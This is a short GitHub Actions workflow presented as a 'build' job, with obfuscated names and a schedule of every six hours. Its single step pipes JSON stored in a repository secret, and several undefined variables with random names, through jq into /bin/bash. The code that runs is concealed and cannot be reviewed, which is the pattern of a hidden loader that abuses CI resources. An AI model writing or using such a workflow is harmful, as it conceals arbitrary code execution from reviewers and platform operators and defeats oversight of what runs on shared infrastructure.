name: dongguange7412

on:
  workflow_dispatch:
  schedule:
    - cron: '31 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: dongguange7412
        env:
          xx097: ${{ secrets.xx097 }}
        run: |
          echo $xx097 | jq -r .y37 | /bin/bash
          echo $qq874 | jq -r .x2979 | /bin/bash
          echo $djx33107 | jq -r .ipdn453 | /bin/bash
          echo $cqv39480 | jq -r .cgdrv38 | /bin/bash
          echo $oxccg83665 | jq -r .kzu605 | /bin/bash

